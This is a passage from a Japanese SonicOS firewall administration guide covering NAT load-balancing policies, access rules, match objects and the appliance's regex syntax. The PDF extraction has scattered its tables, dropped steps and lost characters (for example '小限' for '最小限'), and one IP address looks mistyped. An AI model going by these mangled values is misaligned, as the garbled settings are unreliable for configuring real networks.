テーブルに追加されます。

13 「閉じる」を選択して「NAT ポリシーの追加」ダイアログを閉じます。

オプションの選択: 多対多の NAT ポリシーの例

オプション値

変換前の送信元 LAN サブネット

変換後の送信元 public_range









再帰ポリシーを作成する (淡色表示)



このポリシーを適用すると、ファイアウォールは、作成した範囲内で使用可能な 4 つの IP アドレスを

使用して、送信トラフィックを動的に割り付けます。

時刻動的な割付をテストするには、 LAN インターフェース (既定では X0 インターフェース) 上の拡散

したアドレス範囲 (192.168.10.10、 192.168.10.100、 192.168.10.200 など) に複数のシステ

ムをインストールして、各システムからパブリックウェブサイト〈http://www.whatismyip.com〉にアクセスします。各システムには、作成して NAT ポリシーに連結した範囲の中から別々の IP アドレ

スが表示されるはずです。

1 対多の NAT 負荷分散の設定

1 対多のネットワークアドレス変換 (NAT) ポリシーを使用することにより、変換前の送信元 IP アドレ

スを恒久性への鍵として使用して、恒久性を維持しながら、変換後の送信先の負荷を均衡化できます。例えば、ファイアウォールでは、適切な宛先の SMA に対して常にクライアント間の均衡を取る

ことによって、セッションの恒久性を維持しながら複数の SonicWall SMA 装置の負荷分散を可能にし

ています。

この NAT ポリシーは、アクセス許可ルールと組み合わせられます。

1 対多の負荷分散ポリシーとアクセスルールを設定するには、以下の手順に従います。



メモ：多対多の NAT ポリシーに、同じネットワーク接頭辞を持つ変換前の送信元と変換後の送

信元が含まれる場合、 IP アドレスの残りの部分は変わりません。



http://www.whatismyip.com

3 オプションの選択: 1 対多アクセスルールテーブルに表示された値を入力します。

オプションの選択: 1 対多アクセスルール

オプション値

動作許可

送信元 WAN

送信先 LAN

送信元ポートポートを選択。既定は「すべて」

メモ：「送信元ポート」を設定すると、アクセスルールは選択さ

れたサービスオブジェクト /グループで定義されている送信元

ポートに基づいてトラフィックをフィルタ処理します。選択されたサービスオブジェクト /グループには、「サービス」で選択す

るのと同じプロトコル種別が設定されている必要があります。

サービス HTTPS

送信元すべて

送信先 WAN プライマリ IP

包含ユーザすべて

除外ユーザなし (既定)



4 「追加」を選択します。ルールが追加されます。


6 「ルール > NAT ポリシー」ページを開きます。

7 ページの上部にある「追加」を選択します。「NAT ポリシーの追加」ダイアログが表示されます。

8 NAT ポリシーを作成することにより、ウェブサーバがマッピング済みのパブリック IP アドレス

を使用してパブリックインターネットへのトラフィックを開始できるようにするには、オプ

ションの選択: 1 対多の NAT 負荷分散ポリシーの例テーブルのオプションを選択します。


コメント SMA LB などの説明テキスト

ログを有効にする選択

断片化パケットを許可する選択

他のすべてのオプション未選択

オプションの選択: 1 対多の NAT 負荷分散ポリシーの例

オプション値



変換前の送信先 WAN プライマリ IP

オプションの選択: 1 対多アクセスルール

オプション値



9 設定が完了したら、「追加」ボタンを選択し、 NAT ポリシーを追加して有効にします。


1 対多 NAT 負荷分散ポリシーのより具体的な例については、 2 つのウェブサーバの NAT 負荷分散の設

定を参照してください。

2 つのウェブサーバの NAT 負荷分散の設定

これは、 1 対多 NAT 負荷分散ポリシーのより具体的な例です。この例で NAT 負荷分散を設定するに

は、次の作業を行います。

1 ロギングのログと名前解決の有効化

2 アドレスオブジェクトとアドレスグループの作成

変換後の送信先「新しいアドレスオブジェクトの作成」を選択すると、「アドレス

オブジェクトの追加」ダイアログが表示されます。オプションの選択: 「アドレスオブジェクトの追加」ダイアログのオプションを使用

します。

変換前のサービス HTTPS

変換後のサービス HTTPS

受信インターフェースすべて


コメント SMA LB などの説明テキスト

NAT ポリシーを有効に

する

選択

再帰ポリシーを作成する

非選択

オプションの選択: 1 対多の NAT 負荷分散ポリシーの例

オプション値

オプションの選択: 「アドレスオブジェクトの追加」ダイアログ

オプション値

名前説明的な名前 (例えば MySMA)

ゾーンの割り当て LAN

種別ホスト

IP アドレス負荷分散する機器の IP アドレス (上記の図に示し

たトポロジの場合は、 192.168.200.10、192.168.200.20、および 192.168.200.30。 )



3 受信 NAT 負荷分散ポリシーの作成

4 送信 NAT ポリシーの作成

5 アクセスルールの作成

6 NAT 負荷分散設定の確認とトラブルシューティング

ロギングのログと名前解決の有効化

ログ採取を有効にするには:

1 管理ビューで、「ログと報告 | ログ設定 > 基本設定」ページを開きます。

2 「ログレベル」の横のドロップダウンメニューから「デバッグ」を選択します。

3 「設定」アイコンを選択して、「すべての種別の属性の編集」ダイアログを開きます。

4 「イベントをログ監視に表示する」および他の設定の「有効化」を選択します。

5 「すべての種別の属性を編集」ダイアログで「許可」をリックします。

6 「ログ設定 > 基本設定」で「適用」を選択すると、変更内容が保存されて有効になります。

重要：すべての種別のログの記録、およびログの名前解決を有効にすることを強くお勧めします。

ヒント：デバッグレベルのログは初期の設定およびトラブルシューティングの目的に

限って使用し、設定が完了した時点で、実際のネットワーク環境に合った適切なログレベルを設定することをお勧めします。



ログの名前解決を有効にするには、以下の手順を実行します。

1 管理ビューで、「ログと報告 |ログ設定 > 名前解決」ページを開きます。

2 「名前解決方法」ドロップダウンメニューで「DNS の後に NetBIOS」を選択します。「DNS の設

定」セクションが表示されます。

3 「WAN ゾーンと同じ DNS サーバ設定にする」オプションを選択します。「ログ名前解決用 DNSサーバ」の各フィールドの値は自動的に設定され、変更できません。

4 「許可」ボタンを選択して、変更内容を保存し有効にします。

アドレスオブジェクトとアドレスグループの作成

アドレスオブジェクトとアドレスグループを作成するには：


2 両方の内部ウェブサーバ用のアドレスオブジェクトと、外部ユーザがサーバへのアクセスに使

用する仮想 IP を作成します。以下に例を示します。



3 「アドレスグループ」ボタンを選択します。

4 www_group という名前のアドレスグループを作成し、直前の手順で作成した 2 つの内部サーバ

アドレスオブジェクトを追加します。以下に例を示します。

受信 NAT 負荷分散ポリシーの作成

受信 NAT 負荷分散ポリシーを設定するには、次の手順を実行します。


2 「追加」を選択し、 www_group の受信 NAT ポリシーを作成します。これによって、仮想 IP にア

クセスしようとする人には、作成したばかりのアドレスグループに変換されます。「一般」の

設定を以下に示します。



3 「詳細設定」を選択します。「NAT 方式」の「詳細」画面で、「NAT 方式」として「固定 IP」を

選択します。

4 「高可用性」で、「論理監視を有効にする」チェックボックスをオンにします。

5 「論理監視種別」の場合、ドロップダウンリストから「TCP」を選択し、 80 を「ポート」フィー

ルドに入力します。

メモ：この段階では、まだ NAT ルールの保存は行わないでください。



SonicOS は、 TCP ポート 80 を監視することによって、サーバが正常に動作、応答しているかを

確認します (このポートはユーザのアクセス先です)。

6 「追加」を選択し、変更内容を保存して有効にします。

7 「閉じる」ボタンを選択します。

送信 NAT ポリシーの作成

対応する発信 NAT ポリシーを設定するには、次の手順を実行します。


2 「追加」を選択して、 www_group の「送信」 NAT ポリシーを作成します。これによって、 WANインターフェース (規定では X1 インターフェース) からリソースにアクセスするときに、内部

サーバを仮想 IP に変換することができます。「一般」設定を以下に示します。「詳細」設定は

必要ありません。

メモ：次の作業に進む前に、ログと状況のページをチェックして、リソースが検出済みであること、およびリソースがオンライン状態であることを示すログが記録されていることを確認してください。正常ならば、「ネットワーク監視: ホスト 192.160.200.220 はオンラインです」 (IP アドレスは実際に使用されている値になります) というメッセージを

持つ 2 件の警告が「ファイアウォールイベント」として表示されるはずです。この 2 つの

メッセージが表示されていない場合は、これまでの手順が適切に実行されているか確認してください。



アクセスルールの作成

アクセスルールを設定するには：


2 「追加」を選択して、アクセスルールを作成し、外部からのトラフィックが仮想 IP 経由で内部

ウェブサーバにアクセスできるようにします。



3 「追加」を選択してアクセスルールを作成します。

4 「閉じる」を選択してダイアログを閉じます。

NAT 負荷分散設定の確認とトラブルシューティング

WAN を経由しないコンピュータのブラウザを使用して、内部ウェブサーバの 1 つでホストされている

ウェブページに HTTP 経由で接続して作業をテストします。仮想 IP 経由で接続する必要があります。

ウェブサーバに対するアクセスが正常に行われていないと思われる場合は、「ポリシー > アクセス

ルール管理」ページを表示して、マウスポインタを統計アイコンの上に移動してください。

ルールが正しく設定されていない場合には、受信バイトと送信バイトの統計情報はまったく表示されませんが、正常に機能している場合は、負荷分散対象リソースに対する外部からのアクセスが成功するたびに、これらのバイト数が増加するのを確認できます。

また、「ポリシー > NAT ポリシー」ページで統計アイコンにマウスポインタを合わせてチェックする

こともできます。ポリシーが正しく設定されていない場合には、受信バイトと送信バイトの統計情報はまったく表示されませんが、正常に機能している場合は、負荷分散対象リソースに対する外部からのアクセスが成功するたびに、これらのバイト数が増加するのを確認できます。

後に、ログと状況のページをチェックして、オフラインのホストがあることを示すネットワーク監視からの (黄色の) 警告が表示されていないか確認する必要があります。正常にアクセスできない場合

メモ： 1 つ以上の SonicWall SMA アプライアンスの負荷を分散する場合は、許可されたサービス

として HTTP ではなく HTTPS を使用して、これらの手順を繰り返します。



は、負荷分散用に設定されているすべてのリソースがファイアウォールから到達不能になっているおそれがあり、その場合には、それらのリソースがオフラインでサービス停止の状態にあることが監視メカニズムによって検出されている可能性があります。負荷分散用のリソース、およびそれらとファイアウォールの間のネットワーク接続の状態をチェックして、それらが正常に機能していることを確認してください。

NAT64 ポリシーのための WAN から WAN へのアクセスルー

ルの作成

IPv6 専用クライアントが IPv4 クライアント /サーバに対する接続を開始しても、 NAT64 トランスレー

タに届く IPv6 パケットは、次のように通常の IPv6 パケットのように見えます。

• 送信元ゾーンは LAN。

• 送信先ゾーンは WAN。

これらのパケットは、 SonicOS によって処理された後、 IPv4 パケットに変換され、再びファイア

ウォールによって処理されます。この時点で、これらのパケットのソースゾーンは WAN であり、宛

先ゾーンは元の IPv6 パケットと同じです。これらの IPv4 パケットのキャッシュがまだ作成されてい

ない場合、これらのパケットはポリシー検査を受けます。これらのパケットがドロップされないようにするには、 WAN から WAN への許可アクセスルールを設定する必要があります。

WAN から WAN へのポアクセスルールを作成するには、以下の手順に従います。




2 「追加」を選択します。「ルールの追加」ダイアログが表示されます。

3 以下のオプションを設定します。

オプション値

動作許可

送信元 WAN

送信先 WAN

送信元ポートすべて

サービスすべて

送信元すべての WAN IP

メモ：「すべての WAN IP」は、ファイアウォールの WAN イン

ターフェースに属するすべての WAN IP アドレスを含む SonicOS によって作成される既定のアドレスグループです。すべての WAN IPは設定できません。

包含ユーザすべて

除外ユーザなし






コメントサービスを問わない任意のネットワーク間の IPv4 (オプション)

他のすべてのオプションそのままにしておくか、必要に応じて適宜設定します。

オプション値




ポリシー | オブジェクト

第 2 部

149

ポリシー | オブジェクト

• 一致オブジェクトの設定

• 動作オブジェクトの設定

• アドレスオブジェクトの設定

• サービスオブジェクトの設定

• 帯域幅オブジェクトの設定

• 電子メールアドレスオブジェクトの設定

• コンテンツフィルタオブジェクトの設定

5

一致オブジェクトの設定

• オブジェクト > 一致オブジェクト (150 ページ)



• 一致オブジェクトの設定 (164 ページ)

• アプリケーションリストオブジェクトの設定 (165 ページ)

オブジェクト > 一致オブジェクト

このセクションでは、一致オブジェクトおよびアプリケーションリストオブジェクトの概要と、そ

れらを作成および設定する方法について説明します。

トピック :



• 一致オブジェクトの設定 (164 ページ)

• アプリケーションリストオブジェクトの設定 (165 ページ)

一致オブジェクトについて一致オブジェクトは、動作を実行するために満たす必要がある条件のセットを表します。これには、オブジェクト種別、一致する種別 (完全、部分、正規表現、前方、または後方)、入力形式 (テキスト

または 16 進)、および照合する実際のコンテンツが含まれます。一致オブジェクトは、以前のリリー

スではアプリケーションオブジェクトと呼ばれていました。


一致オブジェクトの設定150

実行可能ファイルなどのバイナリコンテンツを照合する場合は 16 進入力形式を使用し、ファイルや

電子メールのコンテンツなどを照合する場合は英数字 (テキスト ) 入力形式を使用します。また、 16進入力形式は、グラフィックイメージ内のバイナリコンテンツに対しても使用できます。グラ

フィックのいずれかのプロパティフィールドに特定の文字列が含まれている場合は、テキスト入力

形式を使用して同じグラフィックを照合することもできます。正規表現 (regex) は、特定の文字列や

値ではなくパターンを照合するためのもので、英数字入力形式を使用します。

ファイル内容一致オブジェクト種別は、ファイル内のパターンやキーワードを照合するための方法を提供します。この種別の一致オブジェクトは、 FTP データ転送、 HTTP サーバ、または SMTP クライア

ントポリシーでのみ使用できます。

サポートされている一致オブジェクト種別に、サポートされている一致オブジェクト種別を示します。

サポートされている一致オブジェクト種別

オブジェクト種別説明一致する種別不一致検索追加のプロパティ

ActiveX クラス ID ActiveX コンポーネント

のクラス ID。例えば、

Gator ActiveX コンポー

ネントのクラス ID は“c1fb8842-5281-45ce-a271-8fd5f117ba5f"です。

完全いいえなし

アプリケーション種別リスト

アプリケーション種別 (マルチメディア、

P2P、ソーシャルネッ

トワーキングなど) を指定できます。

N/A いいえなし

アプリケーションリスト

選択したアプリケーション種別内で個々のアプリケーションを指定できます。

N/A いいえなし

アプリケーションシグネチャリスト

選択したアプリケーションや種別に対して個々のアプリケーションを指定できます。

N/A いいえなし



個別オブジェクト IPS 形式の条件の個

別セットを指定できます。

完全いいえ 4 つのオプションパラ

メータを追加で設定できます。それらは

オフセット、深度、小ペイロードサイ

ズ、大ペイロードサイズです。オフ

セットは、パケットペイロード内のどのバイトからパターンの照合を開始するかを指定します (値は 1 から始まり、照合における誤検出を小限にする働きをします)。深度は、パケッ

トペイロード内のど

のバイトでパターンの照合を終了するかを指定します (値は 1 から始まります)。

電子メール本文電子メール本文内のすべての内容。

処理中いいえなし

電子メール CC の送信

先 (MIME ヘッダー)CC MIME ヘッダー内

のすべての内容。

完全、部分、前方、後方

はいなし

電子メール送信元 (MIME ヘッダー)

From MIME ヘッダー

内のすべての内容。


はいなし

電子メールサイズ送信を許可する大電子メールサイズを

指定できます。

N/A いいえなし

電子メール件名 (MIME ヘッダー)

Subject MIME ヘッダー

内のすべての内容。


はいなし

電子メール送信先 (MIME ヘッダー)

To MIME ヘッダー内の

すべての内容。


はいなし

MIME 個別ヘッダー MIME 個別ヘッダーを

作成できます。


はい個別ヘッダー名を指定する必要があります。

ファイル内容ファイル内容で照合するパターンを指定できます。パターンは、ファイルが圧縮されている場合でも照合されます。

処理中いいえこのオブジェクトには“添付ファイルを無

効にする"動作を適用

しないでください。





ファイル名電子メールの場合、これは添付ファイルの名前です。 HTTP の場

合、これはウェブメールアカウントに

アップロードされた添付ファイルの名前です。 FTP の場合は、

アップロードまたはダウンロードされたファイルの名前です。


はいなし

ファイル拡張子電子メールの場合、これは添付ファイルのファイル拡張子です。HTTP の場合、これは

ウェブメールアカウン

トにアップロードされた添付ファイルのファイル拡張子です。 FTP の場合は、アップロードまたはダウンロードされたファイルのファイル拡張子です。

完全はいなし

FTP コマンド特定の FTP コマンド

を選択できます。

N/A いいえなし

FTP コマンド+値特定の FTP コマンドと

値を選択できます。


はいなし

HTTP Cookie ヘッダーブラウザから送信される Cookie を指定で

きます。


はいなし

HTTP Host ヘッダー HTTP Host ヘッダー内

の内容。 HTTP 要求に

おける送信先サーバのホスト名を表します (例えば、

www.google.com)。


はいなし

HTTP Referrer ヘッ

ダー

ブラウザから送信される Referrer ヘッダー

の内容を指定できます。この機能は、

ユーザがどのウェブサイトから顧客のウェブサイトにリダ

イレクトされたかの統計情報を制御または収集するのに便利です。


はいなし





HTTP Request 個別ヘッ

ダー

個別 HTTP Request ヘッ

ダーを処理できます。



HTTP Response 個別

ヘッダー

個別 HTTP Response ヘッダーを処理できます。



HTTP Set Cookie ヘッダー

Set-Cookie ヘッダー。

ブラウザに特定の Cookie を設定できな

いようにするための方法を提供します。


はいなし

HTTP URI コンテンツ HTTP 要求の URI 内の

すべての内容。完全、部分、前方、後方

いいえなし

HTTP User-Agent ヘッダー

User-Agent ヘッダー内

のすべての内容。以下に例を示します。User-Agent: Skype。


はいなし

ウェブブラウザ特定のウェブブラウ

ザを選択できます (MSIE、 Netscape、Firefox、 Safari、Chrome)。

N/A はいなし

IPS シグネチャ種別リ

スト

1 つ以上の IPS シグネ

チャグループを選択

できます。各グループに複数の定義済み IPS シグネチャが含ま

れます。

N/A いいえなし

IPS シグネチャリスト粒度を高めるために 1 つ以上の特定の IPS シグネチャを選択できます。

N/A いいえなし





使用できる一致オブジェクトの種別は、「一致オブジェクトの設定」ダイアログのドロップダウン

メニューで確認できます。

• 「一致オブジェクトの追加 / 編集」ダイアログでは、複数のエントリを追加して、照合するコ

ンテンツ要素のリストを作成できます。一致オブジェクトで指定したすべての内容は、照合の目的で大文字と小文字が区別されることはありません。バイナリ内容を照合するには 16 進形

式を使用します。 16 進エディタや、 Wireshark のようなネットワークプロトコルアナライザを

使用すると、バイナリファイルの 16 進形式を取得できます。これらのツールの詳細について

は、次のセクションを参照してください。

• Wireshark (46 ページ)

• 16 進エディタ (48 ページ)

「ファイルからロード」ボタンを使用すると、照合する一致オブジェクトの複数のエントリを含む定義済みのテキストファイルから内容をインポートできます。ファイル内のエントリは、それぞれ 1 行に 1 つずつ記述されている必要があります。「ファイルからロード」機能を使用すると、ファイア

ウォール間でアプリケーションルールの設定を容易に移行できます。

複数のエントリ (テキストファイルから読み込まれたエントリまたは手動で入力されたエントリ ) は「リスト」領域に表示されます。リストされたエントリは論理和を使用して照合されるため、リスト

内のいずれかのアイテムが一致すると、当該ポリシーの動作が実行されます。

1 つの一致オブジェクトには、合計で 8000 文字まで含めることができます。一致オブジェクト内の

各要素に含まれる文字数が約 30 である場合、約 260 個の要素を入力できることになります。大要

素サイズは 8000 バイトです。

トピック :

• 正規表現について (156 ページ)

• 不一致検索について (160 ページ)



正規表現についてアプリケーションルールポリシーで使用するため、特定の一致オブジェクト種別に正規表現を設定

できます。「一致オブジェクトの設定」オプションでは、個別正規表現を設定したり、あらかじめ定義された正規表現から選択したりできます。 SonicWall セキュリティ装置は、ネットワークトラ

フィックに対して再組み立て不要の正規表現による照合をサポートしています。このため、入力ストリームのバッファリングが不要で、パターンはパケット境界をまたがって照合されます。

SonicOS には、以下の定義済み正規表現が用意されています。

正規表現を使用するポリシーは、ネットワークトラフィック内の該当するパターンのうち、初に

出現するものに一致します。そのため、一致に対して可能な限り速やかに動作できます。照合は、人間が読み取れるテキストだけではなくネットワークトラフィックに対しても実行されるので、照合

可能な英字には ASCII 文字セット全体 (全 256 文字) が含まれます。

'.'、 (任意の文字ワイルドカード )、 '*'、 '?'、 '+'、繰り返しカウント、代替、および否定などの一般的

な正規表現の基本命令がサポートされています。構文とセマンティクスは Perl や vim などの一般的な

正規表現の実装と似ていますが、わずかな違いがあります。例えば、行頭演算子 (^) と行末演算子 ($)はサポートされていません。また、 '\z' は、 PERL のように文字列の終わりを指すのではなく、 0 以外

の数字、すなわち [1-9] を指します。詳細については、正規表現の構文 (157 ページ) を参照してくだ

さい。

VISA CC VISA クレジットカード番号

US SSN 米国の社会保障番号

CANADIAN SIN カナダの社会保険番号

ABA ROUTING NUMBER 米国銀行協会のルーティング番号

AMEX CC American Express クレジットカード番号

MASTERCARD CC Mastercard クレジットカード番号

DISCOVER CC Discover クレジットカード番号



Perl 正規表現エンジンとの大きな違いの 1 つは、後方参照と置換がサポートされていないことです。

これらの機能は実際には正規表現に無関係で、調べているデータについて線形時間では実行できません。したがって、高のパフォーマンスを維持するため、これらの機能はサポートされていません。置換または変換機能がサポートされていないのは、ネットワークトラフィックを検査するだけで、

変更はしないからです。

よく使用されるパターン (米国の社会保障番号や VISA のクレジットカード番号など) 向けにあらかじ

め定義された正規表現は、一致オブジェクトの作成時に選択できます。ユーザは、同じ一致オブジェクト内に独自の表現を記述することもできます。ユーザが入力した表現は解析され、正しく解析されなかった表現があれば、「一致オブジェクトの設定」ウィンドウの下部に構文エラーが表示されます。解析が正しく完了した後、正規表現はコンパイラに渡され、ネットワークトラフィックをリア

ルタイムでスキャンするのに必要なデータ構造が作成されます。

決定性有限オートマトン (DFA) というデータ構造を作成することによって、正規表現が効率的に照合

されます。 DFA のサイズはユーザが入力した正規表現によって決定され、機器のメモリ容量によって

制約を受けます。複雑な正規表現のコンパイル処理には長い時間がかかり、装置のメモリを大量に消費することがあります。含まれる表現によっては、 DFA の作成に大 2 分かかることもあります。

装置管理の応答性に対する影響が大きすぎるだけでなく、悪用やサービス拒否攻撃を防ぐため、コンパイラは処理を中止し、データ構造が機器に対して大きくなりすぎる正規表現を拒否できます。ウィンドウの下部に、 "悪用を検出しました" というエラーメッセージが表示されます。

大きなカウンタを含む表現の DFA を作成すると、多くの時間とメモリが消費されます。そのような表

現は、 '*' 演算子と '+' 演算子などの無制限のカウンタを使用する表現よりも拒否される可能性が高く

なります。

同様に、拒否されるおそれがある表現としては、文字範囲や文字クラスよりも多数の文字を含む表現があります。つまり、すべて小文字のセットを指定する '(a|b|c|d|.。 .|z)' という表現は、同等

の文字クラス '\l' よりも拒否される可能性が高くなります。 '[a-z]' という範囲を使用すると、内部

的に '\l' に変換されます。ただし、 '[d-y]' または '[0-Z]' という範囲は、文字クラスに変換でき

ず、長いので、この断片を含む表現は拒否される可能性があります。

表現が拒否されたときはいつでも上記のヒントを利用して、拒否されないように、より効率的な方法で書き直すことができます。詳細については、正規表現の構文 (157 ページ) を参照してください。例

えば、個別正規表現の記述方法については、一致オブジェクトでの正規表現の作成 (52 ページ) を参

照してください。

正規表現の構文正規表現の構文: 単一文字～正規表現の構文: 演算子の優先順位 (降順) に、正規表現の作成に使用す

る構文を示します。

メモ：長時間のコンパイル中、装置管理セッションが一時的に反応しなくなることがありますが、ネットワークトラフィックは装置に送信され続けています。

正規表現の構文: 単一文字

表現定義

. '\n' 以外の任意の文字。 '\n' も照合するには、 /s (ストリームモード、または 1行モードとも呼ばれる) 修飾子を使用します。

[xyz] 文字クラス。エスケープ文字も指定できます。かっこ ([ ]) で囲まれた特殊文字

は特別な意味を持たないので、エスケープする必要はありません。

[^xyz] 文字クラスを打ち消します。



\xdd 16 進数入力。 "dd" は文字の 16 進値です。 2 つの数字が必須です。例えば、 \r は\x0d で、 \xd ではありません。

[a-z][0-9] 文字範囲。

正規表現の構文: 複合

表現定義

xy x に y が続く

x|y x または y

(x) x と同等です。優先をオーバーライドするのに使用できます。

正規表現の構文: 繰り返し

表現定義

x* 0 個以上の x

x? 0 または 1 個の x

x+ 1 個以上の x

x{n, m} 小 n 個、大 m 個の連続した x。そのため、不当に大きい m を使用することは

賢明ではありません。

x{n} 正確に n 個の x

x{n,} 小 n 個の x

x{,n} 大 n 個の x

正規表現の構文: エスケープシーケンス

表現定義

\0、 \a、 \b、 \f、\t、 \n、 \r、 \v

C プログラミング言語のエスケープシーケンス (\0 は NULL 文字 (ASCII 文字の

ゼロ))

\x 16 進数入力。 \x とそれに続く 2 つの 16 進数字は、対象の文字の 16 進値を示

します。

\*、 \?、 \+、 $, $、\[, \]、 \{, \}、 \\、 \/、 \<スペース>、 \#

特殊文字をエスケープします。

メモ：処理されないコメントの前には、任意の数のスペースと 1 個のポンド

記号 (#) が付きます。そのため、スペースまたはポンド記号 (#) を照合するに

は、エスケープシーケンス \ および \# を使用する必要があります。

正規表現の構文: Perl に似た文字クラス

表現定義

\d、 \D 数字、数字以外。

\z、 \Z 0 以外の数字 ([1-9])、それ以外のすべての文字。

正規表現の構文: 単一文字

表現定義



その他の一般的な文字クラスの一部は、上記の基本命令から作成できます。以下の文字クラスに関しては、使用できる残りの文字に適切なニーモニックがないため、独自の簡略表現はありません。

\s、 \S ホワイトスペース、ホワイトスペース以外。 [\t\n\f\r] と同等です。 \v はPerl のホワイトスペースには含まれません。

\w、 \W 単語文字、単語文字以外。 [0-9A-Za-z_] と同等です。

正規表現の構文: その他の ASCII 文字クラスの基本命令

文字クラス表現

[:cntrl:] \c、 \C 制御文字。 [\x00 - \x1F\x7F]

[:digit:] \d、 \D 数字、数字以外。 Perl 文字クラスと同じです。

[:graph:] \g、 \G スペース以外の任意の印刷可能文字。

[:xdigit:] \h、 \H 任意の 16 進数字。 [a-fA-F0-9]。水平スペースを意味する Perl の\h とは異なります。

[:lower:] \l、 \L 任意の小文字。

[:ascii:] \p、 \P 正の ASCII 文字、負の ASCII 文字。 [0x00 - 0x7F]、 [0x80 - 0xFF]

[:upper:] \u、 \U 任意の大文字。

正規表現の構文: 複合文字クラス

文字クラス表現

[:alnum:] = [\l\u\d] すべての文字と数字のセット。

[:alpha:] = [\l\u] すべての文字のセット。

[:blank:] = [\t<space>] 空白文字のクラス: タブとスペース。

[:print:] = [\g<space>] すべての印刷可能文字のクラス: スペースを含むすべて

のグラフィカル文字。

[:punct:] = [^\P\c<space>\d\u\l]

すべての句読文字のクラス: 否定 ASCII 文字、制御文字、

スペース、数字、大文字または小文字を含みません。

[:space:] = [\s\v] すべてのホワイトスペース文字。 Perl のホワイトスペースと垂直タブ文字を含みます。

正規表現の構文: 修飾子

表現定義

/i 大文字と小文字を区別する

/s 入力を 1 行として扱います。ストリームモードと考えることもできます。つま

り、 '.' は '\n' にも一致します。

正規表現の構文: 演算子の優先順位 (降順)

演算子結合規則

[ ]、 [^] 左から右

() 左から右

正規表現の構文: Perl に似た文字クラス

表現定義



正規表現でのコメント

SonicOS は、正規表現でコメントをサポートしています。コメントの前には、任意の数のスペースと

1 個のポンド記号 (#) を付けます。スペースとポンド記号の後のテキストはすべて、表現の終わりま

で破棄されます。

不一致検索について不一致検索は、遮断するコンテンツを指定するための別の方法を提供します。不一致検索は、特定のコンテンツ種別を除くすべてのコンテンツを遮断する場合に、一致オブジェクト内で有効にできます。この一致オブジェクトをポリシー内で使用すると、そのポリシーは、一致オブジェクトに指定されているコンテンツの欠如に基づいて動作を実行します。不一致検索オブジェクト内にある複数のリスト登録が論理条件 AND を使用して照合されます。つまり、ポリシーの動作は、指定された不一致

検索登録のすべてが一致した場合に限り実行されます。

すべてのアプリケーションルールポリシーは禁止ポリシーですが、不一致検索を使用することで許

可ポリシーを再現できます。例えば、 .txt 形式の電子メール添付ファイルは許可しつつ、その他す

べてのファイル種別の添付ファイルを遮断できます。また、いくつかの種別を許可してその他すべてを遮断することもできます。

すべての一致オブジェクト種別で不一致検索を利用できるわけではありません。それができるものについては、「一致オブジェクトの追加/編集」ダイアログに「不一致検索を有効にする」チェック

ボックスが表示されます。

*、 +、 ? 左から右

. (連結) 左から右

| 左から右

正規表現の構文: 演算子の優先順位 (降順)

演算子結合規則



アプリケーションリストオブジェクトについて「オブジェクト > 一致オブジェクト」ページの上部にある「追加」ドロップダウンメニューに、「ア

プリケーションリストオブジェクト」オプションも表示され、「一致オブジェクトの作成」ダイア

ログが表示されます。アプリケーションリストオブジェクトを作成するときは、「ルール > アプリ

ケーション制御」ページに表示されているのと同じアプリケーションカテゴリ、シグネチャ、また

は特定のアプリケーションから選択します。ダイアログには 2 つの選択肢があります。

• アプリケーション - この画面ではアプリケーションフィルタオブジェクトを作成できます。こ

の画面では、アプリケーション種別、脅威度、技術の種類、属性を選択できます。選択が終わると、それらの条件に一致するアプリケーションのリストが表示されます。「アプリケーション」画面は、アプリケーションリストタイプの一致オブジェクトを作成する 1 つの方法を提

供します。

• 種別 - この画面では種別フィルタオブジェクトを作成できます。アプリケーション種別のリス

トが表示され、マウスを種別に移動すると説明が表示されます。「種別」画面で、「アプリケーション種別リスト」タイプの一致オブジェクトを作成することができます。

トピック :

• アプリケーションフィルタについて (161 ページ)

• 種別フィルタについて (163 ページ)

アプリケーションフィルタについて

「アプリケーション」画面は、選択するアプリケーションのリストを提供します。表示するアプリケーションは、 1 つ以上のアプリケーション種別、脅威度、技術を選択することによって制御できま

す。また、あるキーワードをすべてのアプリケーション名から検索するには、画面の右上付近にある「検索」フィールドにそのキーワードを入力します。例えば、「検索」フィールドに "bittorrent" と

入力して検索アイコンを選択すると、名前に "bittorrent" (大文字と小文字の区別なし ) が含まれる複数

のアプリケーションが見つかります。

アプリケーションリストが適切に絞り込まれたリストに縮小されると、アプリケーションの隣にあ

るプラス (+) アイコンによってフィルタ向けに個々のアプリケーションを選択して、選択結果をアプ

リケーションフィルタオブジェクトとして個別の名前または自動的に生成された名前で保存できま

す。以下の図に示すダイアログでは、個々のアプリケーションを選択する前に、すべての種別、脅威度、技術が選択されています。



フィルタ向けに選択したアプリケーションは、右側の「アプリケーショングループ」フィールドに

表示されます。このフィールド内のリストは、個々のアイテムを削除したり、イレイサーを選択してすべてのアイテムを削除したりして、編集することができます。以下の図では、「アプリケーション

グループ」フィールドにいくつかのアプリケーションが表示されています。また、左側のアプリケーションリストの選択されているアプリケーションには緑色のチェックマークが付いています。

対象として含めるアプリケーションの選択が終了すると、「一致オブジェクト名」フィールドにオブジェクトの名前を入力し ( 初に「一致オブジェクト名を自動生成する」チェックボックスをオフに

する)、「適用」ボタンを選択できます。「オブジェクト > 一致オブジェクト」ページに、オブジェ

クト種別が「アプリケーションリスト」であるオブジェクト名のリストが表示されます。このオブ

ジェクトは、その後のアプリケーションルールポリシーの作成時に選択できます。

「一致オブジェクト名を自動生成する」オプションを使用して作成されたアプリケーションリスト

オブジェクトには、オブジェクト名の初の文字としてチルダ (~) が表示されます。



種別フィルタについて「種別」タブは、選択するアプリケーション種別のリストを提供します。種別の任意の組み合わせを

選択し、選択結果を種別フィルタオブジェクトとして個別の名前で保存できます。以下の図に示す

ダイアログには、 IM 種別の説明が表示されています。

リスト内の各種別の上にマウスポインタを置くと、その説明を確認できます。

ユーザ定義種別フィルタオブジェクトを作成するには、以下の手順に従います。

1 オプションで、「一致オブジェクト名を自動生成するチェックボックスをオフにして、「一致オブジェクト名」フィールドにブジェクトの名前を入力します。

2 1 つまたは複数の種別のチェックボックスを選択します。

3 「適用」ボタンを選択します。

「オブジェクト > 一致オブジェクト」ページには、オブジェクト種別が「アプリケーション種

別リスト」であるオブジェクト名が表示されます。このオブジェクトは、アプリケーション

ルールポリシーの作成時に選択できます。

「一致オブジェクト名を自動生成する」オプションを使用して作成されたアプリケーションリスト

オブジェクトには、オブジェクト名の初の文字としてチルダ (~) が表示されます。



一致オブジェクトの設定

一致オブジェクトを設定するには:

1 「オブジェクト > 一致オブジェクト」ページに移動します。

2 「オブジェクト > マッチオブジェクト」ページの上部にある「追加」を選択し、「一致オブジェ

